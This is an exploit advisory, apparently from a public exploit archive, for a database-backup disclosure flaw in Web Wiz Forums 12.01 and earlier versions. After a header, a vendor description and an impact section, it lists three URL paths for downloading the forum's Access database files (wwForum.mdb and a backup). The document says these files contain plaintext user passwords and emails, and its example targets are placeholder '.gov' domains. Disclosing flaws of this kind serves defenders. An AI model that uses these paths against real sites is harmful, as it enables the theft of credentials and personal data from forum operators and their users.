Web Wiz Forums 12.01 Database Backup Disclosure

1. ############################################################################
2.  
3. # Exploit Title : Web Wiz Forums 12.01 Database Backup Disclosure
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 26/02/2019
7. # Vendor Homepage : webwiz.net
8. # Software Download Link : webwiz.net/web-wiz-forums/forum-downloads.htm
9. # Software Information Link : webwiz.net/company-info/about.htm
10. # Software Affected Version : 6.34 - 9.64 and 12.01 and other previous versions
11. # Tested On : Windows and Linux
12. # Category : WebApps
13. # Exploit Risk : Medium
14. # Vulnerability Type : CWE-200 [ Information Exposure ]
15. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
19.  
20. ############################################################################
21.  
22. # Description about Software :
23. ***************************
24. Web Wiz Ltd. is a Green Hosting and Data Centre Services Provider offering a wide range
25.  
26. of Eco-Friendly Data Centre Services, Green Web Hosting, Cloud and
27.  
28. Dedicated Servers, Managed Servers and Domain Name Registration Services.
29.  
30. Web Wiz provides services designed to help businesses and individuals
31.  
32. communicate, measure, and support their operations worldwide.
33.  
34. ############################################################################
35.  
36. # Impact :
37. ***********
38. Web Wiz Forum has been reported prone to sensitive information disclosure vulnerability.
39.  
40. An attacker may make a request for and download the underlying Access database file that is used by
41.  
42. the Forum application. Sensitive information that is contained in the database and
43.  
44. stored in plaintext format may be revealed to the attacker.
45.  
46. Information collected in this way may be used to aid in further attacks against the system.
47.  
48. It should be noted that all versions of Web Wiz Forums have been reported prone to this vulnerability.
49.  
50. The remote web server contains an ASP-PHP application that is affected by an information disclosure vulnerability.
51.  
52. The remote server is running Web Wiz Site Forum, a set of ASP-PHP scripts to manage online forums.
53.  
54. This release comes with a 'wwforum.mdb' database, usually located under 'admin', that contains
55.  
56. sensitive information, such as the user passwords and emails.
57.  
58. An attacker may use this flaw to gain unauthorized access to the affected application.
59.  
60. ############################################################################
61.  
62. # Database Backup Disclosure Exploit :
63. *********************************
64.  
65. VULNERABLESITE/[DOMAIN-ADDRESS.gov]/[PATH]/Forumo/admin/database/wwForum-backup.mdb
66.  
67. VULNERABLESITE/[DOMAIN-ADDRESS.gov]/[PATH]/Forumo/admin/database/wwForum.mdb
68.  
69. VULNERABLESITE/[DOMAIN-ADDRESS.gov]/[PATH]/forum/admin/database/wwForum.mdb
70.  
71. ############################################################################
72.  
73. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
74.  
75. ############################################################################